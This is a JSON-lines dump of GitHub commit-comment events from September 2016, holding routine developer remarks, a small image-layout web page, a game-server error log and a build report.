{"id":"4538860748","type":"CommitCommentEvent","actor":{"login":"Enygma2002"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18959602,"position":6,"line":269,"path":"xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/copy.vm","commit_id":"b02aa93cd25d53d16ec1abb37fa63cd21daad380","created_at":"2016-09-09T08:45:53Z","updated_at":"2016-09-09T08:45:53Z","body":"Yes, my original intention was to synchronize the copy UI with the page menu UI that also decides when to show the copy page option, based on the `view` right and `hasCreatePage` variable.\r\n\r\nHowever, after the discussions you mention from http://jira.xwiki.org/browse/XWIKI-12931, we should probably change both the copy menu option and the copy.vm to only require view rights and check the destination once the user has specified it (and tried to copy to it)."}},"created_at":"2016-09-09T08:45:53Z"}
{"id":"4538862916","type":"CommitCommentEvent","actor":{"login":"houd1ni"},"repo":{"name":"dimitrinicolas/marmottajax"},"payload":{"comment":{"id":18959608,"position":null,"line":null,"path":null,"commit_id":"815351fc8c72d4f0d2d4e6f333662264a29a8396","created_at":"2016-09-09T08:46:24Z","updated_at":"2016-09-09T08:46:24Z","body":"I guess, one has two options now: simple and verbose (branch).\r\nIt's very nice idea, but simple option again is very limited by absence of complex parameters' serialization, that I made by several lines. And how about automatic detection of type of data? From regular primitives to FromData.\r\n\r\n`.success and .error` change is Great! `.then and .catch` would be too, but more complex to see.\r\n\r\nWould you also vote for new API for the branch? I also want to make it clear. Will start working in a few days."}},"created_at":"2016-09-09T08:46:24Z"}
{"id":"4538868183","type":"CommitCommentEvent","actor":{"login":"cxl295"},"repo":{"name":"cxl295/waterFall"},"payload":{"comment":{"id":18959621,"position":null,"line":null,"path":null,"commit_id":"e8896016799653c4da9f003b18f930ebfcb2948b","created_at":"2016-09-09T08:47:37Z","updated_at":"2016-09-09T08:47:37Z","body":"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n  <head>\r\n\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n\t<script class=\"jquery library\" src=\"/js/sandbox/jquery/jquery-1.8.2.min.js\" type=\"text/javascript\"></script>\r\n\t<title>RunJS 演示代码</title>\r\n<script>\r\nwindow.onload = function(){\r\n\timgLocation(\"container\",\"box\");\r\n}\r\n\t//通过父级空间传入子级空间\r\n\tfunction imgLocation(parent,content){\r\n\t\t//将parent下所有元素取出\r\n\t\tvar cparent = document.getElementById(parent);\r\n\t\t\r\n\t\t//得到器里面每一个空间\r\n\t\tvar ccontent = getChildElement(cparent,content);\r\n//计算图片宽度\r\n\t\tvar imgWidth = ccontent[0].offsetWidth;\r\n\t\tvar cols= Math.floor(document.documentElement.clientWidth / imgWidth);\r\n\t\t\r\n\t\t//固定化\r\n\t\tcparent.style.cssText = \"width:\"+imgWidth*cols+\"px;margin:0 auto\";\r\n\t}\r\n//得到每一个空间的方法\r\nfunction getChildElement(parent,content){\r\n\tvar contentArr = [];\r\n\tvar allcontent = parent.getElementsByTagName(\"*\");\r\n\tfor(var i=0;i<allcontent.length;i++)\r\n\t{\r\n\t\tif(allcontent[i].className==content)\r\n\t\t\t {contentArr.push(allcontent[i]);}\r\n\t}\r\nreturn contentArr;\r\n}\r\n</script>\r\n<style>\r\nbody{\r\n\tpadding:0px;\r\n\tmargin:0px;\r\n}\r\n\r\n.container{\r\n\tposition:relative;\r\n}\r\n\r\n.box{\r\n\tpadding:5px;\r\n\tfloat:left;\r\n}\r\n\r\n.box_img{\r\n\tpadding:5px;\r\n\tborder:2px solid red;\r\n\tbox-shadow:0 0 10px red;\r\n\tborder-radius:10px;\r\n}\r\n\r\n.box_img img{\r\n\twidth:200px;\r\n\theight:auto;\r\n\tborder-radius:10px;\r\n}\r\n</style>\r\n  </head>\r\n<body>\r\n\t\r\n\t<div class=\"container\">\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t<div class=\"box\">\r\n\t\t\t<div class=\"box_img\">\r\n\t\t\t\t<img src=\"http://pic36.nipic.com/20131224/8803505_155014514000_2.jpg\">\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t\r\n\t\t</div>\r\n\t</div>\r\n\t\r\n  </body>\r\n</html>\r\n"}},"created_at":"2016-09-09T08:47:37Z"}
{"id":"4538872821","type":"CommitCommentEvent","actor":{"login":"JaderDias"},"repo":{"name":"dgryski/carbonapi"},"payload":{"comment":{"id":18959632,"position":null,"line":null,"path":null,"commit_id":"54b58b726bc4911137ba0ecd694c7867fe99fcc1","created_at":"2016-09-09T08:48:45Z","updated_at":"2016-09-09T08:48:45Z","body":"@dgryski I just push a commit that restores that functionality https://github.com/dgryski/carbonapi/commit/502c31afaaae69b212df23e3ba52c889c23f9d18"}},"created_at":"2016-09-09T08:48:45Z"}
{"id":"4538873095","type":"CommitCommentEvent","actor":{"login":"cxl295"},"repo":{"name":"cxl295/waterFall"},"payload":{"comment":{"id":18959633,"position":null,"line":null,"path":null,"commit_id":"e8896016799653c4da9f003b18f930ebfcb2948b","created_at":"2016-09-09T08:48:48Z","updated_at":"2016-09-09T08:48:48Z","body":"<script>\r\nwindow.onload = function(){\r\n\timgLocation(\"container\",\"box\");\r\n}\r\n\t//通过父级空间传入子级空间\r\n\tfunction imgLocation(parent,content){\r\n\t\t//将parent下所有元素取出\r\n\t\tvar cparent = document.getElementById(parent);\r\n\t\t\r\n\t\t//得到器里面每一个空间\r\n\t\tvar ccontent = getChildElement(cparent,content);\r\n//计算图片宽度\r\n\t\tvar imgWidth = ccontent[0].offsetWidth;\r\n\t\tvar cols= Math.floor(document.documentElement.clientWidth / imgWidth);\r\n\t\t\r\n\t\t//固定化\r\n\t\tcparent.style.cssText = \"width:\"+imgWidth*cols+\"px;margin:0 auto\";\r\n\t}\r\n//得到每一个空间的方法\r\nfunction getChildElement(parent,content){\r\n\tvar contentArr = [];\r\n\tvar allcontent = parent.getElementsByTagName(\"*\");\r\n\tfor(var i=0;i<allcontent.length;i++)\r\n\t{\r\n\t\tif(allcontent[i].className==content)\r\n\t\t\t {contentArr.push(allcontent[i]);}\r\n\t}\r\nreturn contentArr;\r\n}\r\n</script>"}},"created_at":"2016-09-09T08:48:48Z"}
{"id":"4538875567","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18959639,"position":27,"line":205,"path":"scripts/interactive-video.js","commit_id":"014a46173eaa49bd0d9e53891060eb21ad7cb3ad","created_at":"2016-09-09T08:49:24Z","updated_at":"2016-09-09T08:49:24Z","body":"I have created a fix for it at https://github.com/h5p/h5p-video/commit/b5ee652356f9630137b6f1fbbbf4b473b3abe3dd and https://github.com/h5p/h5p-interactive-video/commit/ba5ea21d1f93ed6bb63a44ba9aad2eef23e41460"}},"created_at":"2016-09-09T08:49:24Z"}
{"id":"4538877182","type":"CommitCommentEvent","actor":{"login":"zackzou"},"repo":{"name":"zhougz001/zack"},"payload":{"comment":{"id":18959642,"position":null,"line":null,"path":null,"commit_id":"8d958a87b8b30da2c0420db36d3666a3fbac1552","created_at":"2016-09-09T08:49:47Z","updated_at":"2016-09-09T08:49:47Z","body":"Test"}},"created_at":"2016-09-09T08:49:47Z"}
{"id":"4538879526","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18959648,"position":null,"line":null,"path":null,"commit_id":"b16849c29dc8a38cdc77dea5973677a2a47d1cac","created_at":"2016-09-09T08:50:19Z","updated_at":"2016-09-09T08:50:19Z","body":"这里有几个bug\r\n1. 舱盖打开后，舱盖还可以被反复点击并且发出开门声\r\n2. standby时舱盖也能被打开，而且可以多次放入物品（这里可以改为之前说的，鼠标变成not-allowed样式）\r\n3. 部分尺寸较大的物品图片会溢出舱盖（可以改为物品在松开鼠标时进行跟放入箱子一样的落下动画，同时舱门向上滑起）"}},"created_at":"2016-09-09T08:50:19Z"}
{"id":"4538887866","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18959663,"position":null,"line":null,"path":null,"commit_id":"b7300a96ae9832a6f0369b4e7ec27221b950b849","created_at":"2016-09-09T08:52:14Z","updated_at":"2016-09-09T08:52:14Z","body":"From questions arising at [SHA3 with specific length](http://groups.google.com/forum/#!topic/cryptopp-users/q8UsCPSWG58) on the mailing list."}},"created_at":"2016-09-09T08:52:14Z"}
{"id":"4538889855","type":"CommitCommentEvent","actor":{"login":"RapidSport"},"repo":{"name":"RapidSport/RapidSport.github.io"},"payload":{"comment":{"id":18959668,"position":null,"line":null,"path":null,"commit_id":"3af71f2b98ecb4e46a355b65216bcaef197eec0a","created_at":"2016-09-09T08:52:40Z","updated_at":"2016-09-09T08:52:40Z","body":"11"}},"created_at":"2016-09-09T08:52:40Z"}
{"id":"4538891144","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18959670,"position":null,"line":null,"path":null,"commit_id":"8dc0e65845ef2e7c49851004717b06b5b975c33f","created_at":"2016-09-09T08:52:56Z","updated_at":"2016-09-09T08:52:56Z","body":"That would be part of the Question Object refactorisation. \r\n\r\nAnd, as Denis asked, we could use widgets to generate most of the basic elements of a question (like radio, checkboxes, etc), so it would be easier to override them from anywhere.   "}},"created_at":"2016-09-09T08:52:56Z"}
{"id":"4538905570","type":"CommitCommentEvent","actor":{"login":"tammoterhark"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18959697,"position":null,"line":null,"path":null,"commit_id":"8dc0e65845ef2e7c49851004717b06b5b975c33f","created_at":"2016-09-09T08:56:14Z","updated_at":"2016-09-09T08:56:14Z","body":"OK, looks like we are on the right track then."}},"created_at":"2016-09-09T08:56:14Z"}
{"id":"4538906321","type":"CommitCommentEvent","actor":{"login":"appsailor"},"repo":{"name":"Alamofire/AlamofireImage"},"payload":{"comment":{"id":18959699,"position":null,"line":null,"path":null,"commit_id":"fe11f6b577c4175ff5849e864669bcac550627c8","created_at":"2016-09-09T08:56:24Z","updated_at":"2016-09-09T08:56:24Z","body":"Thx. Will wait for final announcement.\n-Aldrin\n\nOn Fri, Sep 9, 2016 at 8:38 PM, Christian Noon <notifications@github.com>\nwrote:\n\n> @appsailor <https://github.com/appsailor> it's not tagged yet. We're\n> still finalizing the Swift 3 releases.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Alamofire/AlamofireImage/commit/fe11f6b577c4175ff5849e864669bcac550627c8#commitcomment-18959514>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AF03Cj0lRT3nM7hRu9T0VQkNOc5hNHfuks5qoRsEgaJpZM4J4xWm>\n> .\n>\n"}},"created_at":"2016-09-09T08:56:24Z"}
{"id":"4538908084","type":"CommitCommentEvent","actor":{"login":"KochiyaOcean"},"repo":{"name":"poooi/poi"},"payload":{"comment":{"id":18959702,"position":null,"line":null,"path":null,"commit_id":"01f64e017363f6a56e5312a987eb18c0c2dc4d11","created_at":"2016-09-09T08:56:49Z","updated_at":"2016-09-09T08:56:49Z","body":"改吧"}},"created_at":"2016-09-09T08:56:49Z"}
{"id":"4538924540","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18959725,"position":null,"line":null,"path":null,"commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T09:00:25Z","updated_at":"2016-09-09T09:00:25Z","body":"@JordiPolo the goal here is to provide an entry point for the remaining functionality. I.e. instead of wrapping the whole `:rand` module into something called `Random`, we added two functions that integrate with Elixir data types but still push the user to use `:rand` for more complex use cases. That's why we haven't moved it to its own module because then we would effectively be wrapping the Erlang module.\r\n\r\nI agree though we should continue adding entries to Kernel with care to avoid bloating it."}},"created_at":"2016-09-09T09:00:25Z"}
{"id":"4538925966","type":"CommitCommentEvent","actor":{"login":"lowks"},"repo":{"name":"censof/ansible-deployment"},"payload":{"comment":{"id":18959727,"position":null,"line":null,"path":null,"commit_id":"48de7df31805bf3fc3fae6cea8d42cc8017ee39b","created_at":"2016-09-09T09:00:41Z","updated_at":"2016-09-09T09:00:41Z","body":"You did research on this ?"}},"created_at":"2016-09-09T09:00:41Z"}
{"id":"4538927690","type":"CommitCommentEvent","actor":{"login":"otacke"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18959728,"position":27,"line":205,"path":"scripts/interactive-video.js","commit_id":"014a46173eaa49bd0d9e53891060eb21ad7cb3ad","created_at":"2016-09-09T09:01:00Z","updated_at":"2016-09-09T09:01:00Z","body":"Thanks! I won't have to spend the weekend figuring it out then :-) Time to hopefully finish my new h5p library :-D"}},"created_at":"2016-09-09T09:01:00Z"}
{"id":"4538934110","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"dmitrydi/movie_pack"},"payload":{"comment":{"id":18959743,"position":43,"line":23,"path":"bin/netflix_do.rb","commit_id":"52d70611c59bc8eed04bec20012acbc282994437","created_at":"2016-09-09T09:02:20Z","updated_at":"2016-09-09T09:02:20Z","body":"Тебе не кажется, что это всё немножко чересчур остроумно? :)\r\nЯ бы сделал маленькую виртусовскую штучку (пусть это будет и дублирования кода некоторое:\r\n```ruby\r\nclass FilterParser\r\n  include Virtus.model\r\n\r\n  attribute :genres, StrArray\r\n  # ... и т.д.\r\nend\r\n# Тогда здесь можно было бы \r\nFilterParser.new(hash).to_h\r\n```"}},"created_at":"2016-09-09T09:02:20Z"}
{"id":"4538937412","type":"CommitCommentEvent","actor":{"login":"freegenie"},"repo":{"name":"matecat/MateCat"},"payload":{"comment":{"id":18959749,"position":26,"line":243,"path":"lib/Controller/API/V2/GlossariesController.php","commit_id":"9c2ffcdbe7e71f140c90b6e99ea80d32bcef4420","created_at":"2016-09-09T09:02:59Z","updated_at":"2016-09-09T09:02:59Z","body":"@Ostico why do we need to specify HTTP host here? "}},"created_at":"2016-09-09T09:02:59Z"}
{"id":"4538937886","type":"CommitCommentEvent","actor":{"login":"jixuege"},"repo":{"name":"jixuege/jixuege.github.io"},"payload":{"comment":{"id":18959752,"position":null,"line":null,"path":null,"commit_id":"ff4ab2fb7963069a9133712ee5bfa76908535cf0","created_at":"2016-09-09T09:03:05Z","updated_at":"2016-09-09T09:03:05Z","body":"修改了绑定域名"}},"created_at":"2016-09-09T09:03:05Z"}
{"id":"4538943246","type":"CommitCommentEvent","actor":{"login":"yixiangtiankai-361"},"repo":{"name":"yixiangtiankai-361/test"},"payload":{"comment":{"id":18959763,"position":null,"line":null,"path":null,"commit_id":"7868dbc5b4592155ec903df02973800695b2bf95","created_at":"2016-09-09T09:04:16Z","updated_at":"2016-09-09T09:04:16Z","body":"将对日记的修改写到网站"}},"created_at":"2016-09-09T09:04:16Z"}
{"id":"4538948291","type":"CommitCommentEvent","actor":{"login":"koriaba"},"repo":{"name":"IT07/a3_vemf_reloaded"},"payload":{"comment":{"id":18959775,"position":null,"line":null,"path":null,"commit_id":"0e56e4866af115cd40b080ecc81229b7686d4cd5","created_at":"2016-09-09T09:05:22Z","updated_at":"2016-09-09T09:05:22Z","body":"Hi.\r\nmy  arma3server_2312_2016-09-09_11-24-09.rpt\r\n\r\n\r\n\r\n> 14:16:28\r\n\r\n File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:16:38 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:38   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:38   Error Undefined variable in expression: _this2\r\n14:16:38 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:16:43 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:43   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:43   Error Undefined variable in expression: _this2\r\n14:16:43 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:16:48 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:48   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:48   Error Undefined variable in expression: _this2\r\n14:16:48 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:16:53 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:53   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:53   Error Undefined variable in expression: _this2\r\n14:16:53 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:16:58 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:58   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:16:58   Error Undefined variable in expression: _this2\r\n14:16:58 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:17:33 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:33   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:33   Error Undefined variable in expression: _this2\r\n14:17:33 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:17:44 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:44   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:44   Error Undefined variable in expression: _this2\r\n14:17:44 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:17:49 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:49   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:49   Error Undefined variable in expression: _this2\r\n14:17:49 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:17:59 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:59   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:17:59   Error Undefined variable in expression: _this2\r\n14:17:59 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:18:19 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:19   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:19   Error Undefined variable in expression: _this2\r\n14:18:19 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:18:24 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:24   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:24   Error Undefined variable in expression: _this2\r\n14:18:24 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:18:29 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:29   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:29   Error Undefined variable in expression: _this2\r\n14:18:29 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:18:39 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:39   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:39   Error Undefined variable in expression: _this2\r\n14:18:39 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34\r\n14:18:44 Error in expression < ] };\r\nprivate _arr = nearestLocations [ _this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:44   Error position: <_this2, _t, if ( _ms0 > 0 ) then { _ms0 >\r\n14:18:44   Error Undefined variable in expression: _this2\r\n14:18:44 File a3_vemf_reloaded\\fn\\fn_findPos.sqf, line 34"}},"created_at":"2016-09-09T09:05:22Z"}
{"id":"4538956267","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18959796,"position":30,"line":64,"path":"ChickenAdventure/Assets/Scripts/Save.cs","commit_id":"a53cc740ced206b1f20197cc38475d8f7b01fbcf","created_at":"2016-09-09T09:07:12Z","updated_at":"2016-09-09T09:07:12Z","body":"En théorie ça devrait le faire...\r\nhttp://docs.unity3d.com/ScriptReference/SerializeField.html\r\n...mais les forums sont plein de monde qui hurle que leur Vector3 ne se sérialise pas... bwef."}},"created_at":"2016-09-09T09:07:12Z"}
{"id":"4538957638","type":"CommitCommentEvent","actor":{"login":"kevinmartinmauro"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":18959800,"position":null,"line":null,"path":null,"commit_id":"9eb50a962400bae76478aa7fdc07b66c8fc2d81a","created_at":"2016-09-09T09:07:29Z","updated_at":"2016-09-09T09:07:29Z","body":"Why did you remove getContractInfo? It is now much more difficult to get the abi of an already deployed contract, which makes this much less of an open-source project"}},"created_at":"2016-09-09T09:07:29Z"}
{"id":"4538961420","type":"CommitCommentEvent","actor":{"login":"oswetto"},"repo":{"name":"oswetto/Loboevolution"},"payload":{"comment":{"id":18959806,"position":null,"line":null,"path":null,"commit_id":"22e640e0c4dcb0a91738521dc68a873685bcd804","created_at":"2016-09-09T09:08:20Z","updated_at":"2016-09-09T09:08:20Z","body":"In license is write this: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. \r\nI think that i can redistribute it with another license without contact old lobo browser developers. I send more mail at lobochief@users.sourceforge.net but without response :-( "}},"created_at":"2016-09-09T09:08:20Z"}
{"id":"4538962773","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":18959808,"position":38,"line":38,"path":"gulp.el","commit_id":"cbff3b029c7dc850676c288b5cd0d570a1906519","created_at":"2016-09-09T09:08:39Z","updated_at":"2016-09-09T09:08:39Z","body":"This conflicts with the `gulp` that is part of Emacs."}},"created_at":"2016-09-09T09:08:39Z"}
{"id":"4538965502","type":"CommitCommentEvent","actor":{"login":"AnyaTyu"},"repo":{"name":"bem-site/cataria"},"payload":{"comment":{"id":18959811,"position":14,"line":47,"path":"server/controllers/index.js","commit_id":"011fcd623ff0959c14b42679e1240554bc478f8e","created_at":"2016-09-09T09:09:15Z","updated_at":"2016-09-09T09:09:15Z","body":"Я бы в переменные для наглядности вынесла все значения + там сверху есть объявление языка, которое надо выпилить при текущей реализации. "}},"created_at":"2016-09-09T09:09:15Z"}
{"id":"4538974026","type":"CommitCommentEvent","actor":{"login":"AnyaTyu"},"repo":{"name":"bem-site/cataria"},"payload":{"comment":{"id":18959832,"position":6,"line":10,"path":"server/middleware/index.js","commit_id":"63d12b3dcfaeb5489a32deffe256d009e41967ee","created_at":"2016-09-09T09:11:10Z","updated_at":"2016-09-09T09:11:10Z","body":"👍 ))"}},"created_at":"2016-09-09T09:11:10Z"}
{"id":"4538985105","type":"CommitCommentEvent","actor":{"login":"dowitsch"},"repo":{"name":"puzzle/cryptopus"},"payload":{"comment":{"id":18959842,"position":14,"line":14,"path":"test/features/ajax_hook_test.rb","commit_id":"08e879e7490c6fabc491c8c4b11e1ad026102f32","created_at":"2016-09-09T09:13:33Z","updated_at":"2016-09-09T09:13:33Z","body":"*message"}},"created_at":"2016-09-09T09:13:33Z"}
{"id":"4538985640","type":"CommitCommentEvent","actor":{"login":"xiongyq1234"},"repo":{"name":"xiongyq1234/test"},"payload":{"comment":{"id":18959844,"position":1,"line":1,"path":"README.md","commit_id":"a2a7da05bf62926844cb328408015e3750c97003","created_at":"2016-09-09T09:13:41Z","updated_at":"2016-09-09T09:13:41Z","body":"dfgasdfga"}},"created_at":"2016-09-09T09:13:41Z"}
{"id":"4538994112","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":18959860,"position":26,"line":143,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"27d6c52e22d9a3f5533131fbda2f47234dc7ec5c","created_at":"2016-09-09T09:15:32Z","updated_at":"2016-09-09T09:15:32Z","body":"add indentation"}},"created_at":"2016-09-09T09:15:32Z"}
{"id":"4538994307","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18959862,"position":null,"line":null,"path":null,"commit_id":"7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899","created_at":"2016-09-09T09:15:34Z","updated_at":"2016-09-09T09:15:34Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.768.7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899](http://build.palaso.org/viewLog.html?buildId=76767&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:06:25"}},"created_at":"2016-09-09T09:15:34Z"}
{"id":"4538994494","type":"CommitCommentEvent","actor":{"login":"Joedang"},"repo":{"name":"psas/lv3.0-airframe"},"payload":{"comment":{"id":18959863,"position":null,"line":null,"path":null,"commit_id":"fc02e85fc0471cefc436efcd37fff693cf5477bf","created_at":"2016-09-09T09:15:37Z","updated_at":"2016-09-09T09:15:37Z","body":"To do: add a timestamp to one of the lower corners of the poster."}},"created_at":"2016-09-09T09:15:37Z"}
{"id":"4538999590","type":"CommitCommentEvent","actor":{"login":"mmz06"},"repo":{"name":"mmz06/CouchPotatoServer"},"payload":{"comment":{"id":18959877,"position":null,"line":null,"path":null,"commit_id":"813032b0e42b195a28b0d91e23c3f00c20ed90b9","created_at":"2016-09-09T09:16:44Z","updated_at":"2016-09-09T09:16:44Z","body":"Added support for 4K/UHD/2160p for T411, and SSL for T411 access"}},"created_at":"2016-09-09T09:16:44Z"}
{"id":"4538999919","type":"CommitCommentEvent","actor":{"login":"imod"},"repo":{"name":"jenkinsci/config-file-provider-plugin"},"payload":{"comment":{"id":18959880,"position":null,"line":null,"path":null,"commit_id":"13fb076576195b17993e25429f11995405189f60","created_at":"2016-09-09T09:16:49Z","updated_at":"2016-09-09T09:16:49Z","body":"@jglick yes, I was planning to do a release maybe today. Thanks for the pointers!!! "}},"created_at":"2016-09-09T09:16:49Z"}
{"id":"4539001797","type":"CommitCommentEvent","actor":{"login":"srbolle"},"repo":{"name":"srbolle/hello-world"},"payload":{"comment":{"id":18959886,"position":null,"line":null,"path":null,"commit_id":"a60c72e0b2c00101e1233a0ea7788701305e9473","created_at":"2016-09-09T09:17:15Z","updated_at":"2016-09-09T09:17:15Z","body":"Redigering via github."}},"created_at":"2016-09-09T09:17:15Z"}
